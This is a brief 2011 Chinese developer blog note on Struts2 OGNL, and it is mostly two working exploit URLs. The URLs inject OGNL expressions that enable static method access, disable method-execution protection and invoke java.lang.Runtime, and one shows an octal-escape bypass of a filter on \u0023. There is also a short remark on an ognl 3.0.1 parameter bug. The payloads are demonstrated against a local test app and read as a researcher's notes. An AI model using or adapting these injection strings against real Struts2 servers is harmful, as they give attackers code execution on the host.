struts2-ognl mark - 玮哥也是哥 - ITeye博客

`

sw1982

浏览: 505428 次
性别:
来自: 深圳

最近访客更多访客>>

chenliqiang

leileishizhutou

yangky281

polo2008

博主相关

博客

微博

相册

收藏

留言

关于我

文章分类

社区版块

存档分类

最新评论

di1984HIT：学习了~~
jackson JSON对象映射出多余字段的bug
lvye351：当然，在tomcat还有JPDA这种方式，来远程debug： ...
配置linux下tomcat的远程debug
hety163：好，语言简单明了易懂
Http和Socket连接区别
高军威： <b>行不行</b>
XSS转码 && struts2 property标签的bug
chjy1983：请教下，我这样：JSONObject jsonObject = ...
HttpClient4 POST数据及问题

struts2-ognl mark

博客分类：

技术点滴

阅读更多

暂时mark在这，后面再补充

1. 关于漏洞的问题

http://localhost:8080/struts2-blank-2.0.14/example/HelloWorld.action

2.0.9不行

http://localhost:8080/struts2-blank-2.0.14/example/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

2.0.14失效

仅过滤\u0023不行

http://localhost:8080/struts2-blank-2.0.14/example/HelloWorld.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('zz')(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(x))(zzxx))&('aaa')((('\43context.excludeProperties\u003dEMPTY_SET')('x'))(zzxx))&(asdf)(('@java.lang.Runtime@getRuntime().exit(1)')('z'))

2.ognl3.0.1的问题

升级到struts2.2.3之后，ognl3.0.1会产生一个小bug。基本类型的参数，比如int,long,short，如果在请求参数中没有赋值，会抛出NosuchMethod的异常。

分享到：

决策性头脑风暴 | 土匪头头

2011-12-29 16:49
浏览 1542
评论(0)
分类:编程语言
查看更多

评论

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

struts2-xwork-ognl的源文件（jar包）: struts2-xwork-ognl的源文件（jar包），在eclipse中导入就可以直接在eclipse中查看对应的源代码，（注：现在下载的struts2的开发包已不自带此文件）免费的啊

struts2-OGNL表达式测试: struts2-OGNL表达式测试代码

Struts2-OGNL.rar_ognl: Struts2的OGNL表达式语言Object-Graph Navigation Language

struts2-xwork-ognl的javadoc文件（jar包）: struts2-xwork-ognl的javadoc文件，在Eclipse里直接导入，就可以实现随时查询功能。（注：现在下载的struts2的开发包已不自带此文件）

struts-2.3.30-all所有jar包: ognl-3.0.19.jar, org.apache.felix.framework-4.0.3.jar, org.apache.felix.main-4.0.3.jar, org.apache.felix.shell-1.4.3.jar, org.apache.felix.shell.tui-1.4.1.jar, org.osgi.compendium-4.0.0.jar, org.osgi....

mina-integration-ognl-2.0.0-M4.jar: mina-integration-ognl-2.0.0-M4.jar mina-integration-ognl-2.0.0-M4.jar

struts-2.5.2-all所有jar包: ognl-3.1.10.jar, org.apache.felix.framework-4.0.3.jar, org.apache.felix.main-4.0.3.jar, org.apache.felix.shell-1.4.3.jar, org.apache.felix.shell.tui-1.4.1.jar, org.osgi.compendium-4.0.0.jar, org.osgi....

struts2-2.0 jar包: struts2-2.0用到的核心jar包，包括commons-logging-1.0.4.jar，freemarker-2.3.8.jar，ognl-2.6.11.jar，struts2-core-2.0.14.jar，struts2-dojo-plugin-2.1.8.1.jar，xwork-2.0.7.jar

Struts2--5.OGNL: Struts2--5.OGNL

Struts2-2.3.16 全jar包: ognl-3.0.jar struts2-core-2.2.1.1.jar xwork-core-2.2.1.1.jar 共8个包，将其复制到/Struts2/WebRoot/WEB-INF/lib下面方法二：（不用复制，导入法）（1）.右击项目名称Struts2-->Build Path-->Configure ...

struts2--3.Ognl与值栈: struts2--3.Ognl与值栈

Struts2_s2-016&017&ognl2.6.11_patch漏洞补丁: struts.xml文件中新增以下内容：  ...ognl-2.6.11.jar直接覆盖掉原有文件。使用工具进行测试漏洞是否依然存在。 2013年7月25日

Struts2_OGNL: Struts2学习计划5---Struts2_OGNL（对象图导航语言）的学习

struts2-extended-jars: struts2-core-2.1.8.jar;... ognl-2.7.3.jar; ognl-3.0.jar; commons-pool.jar; commons-fileupload-1.2.1.jar; commons-email-1.2.jar; commons-collections-3.1.zip; mysql-connector-java-5.1.6-bin.jar.

struts-2.5.10-all所有jar包: struts2-tiles-plugin-2.5.10.jar,tiles-api-3.0.7.jar,tiles-autotag-core-runtime-1.2.jar,tiles-core-3.0.7.jar,tiles-el-3.0.7.jar,tiles-freemarker-3.0.7.jar,tiles-jsp-3.0.7.jar,tiles-ognl-3.0.7.jar,tiles...

struts-2.0.14-lib Struts2开发包: 包含Struts2框架的核心类库，以及Struts2的第三方插件类库 struts2-core-2.0.14 xwork-2.0.7 ognl-2.6.11 commons-logging-1.0.4 freemarker-2.3.8 等等。

Struts2核心包ognl-2的源代码: Struts2中ognl-2的源代码,从官网下载的

struts2 中 OGNL表达式的使用: struts2 中 OGNL表达式的使用struts2 中 OGNL表达式的使用

struts2 最新漏洞 S2-016、S2-017修补方案 .docx: 4. 将修改后的项目通过 Eclipse 导出为 ognl-my.jar，将它放到 lib 目录。 5. 删除原来 ognl-version.jar。 6. 重启服务器。方案 2：重写 Struts2 DefaultActionMapper 的 handleSpecialParameters 方法，增加...

Struts2深入学习----OGNL表达式原理: NULL 博文链接：https://z-one.iteye.com/blog/1584602

Global site tag (gtag.js) - Google Analytics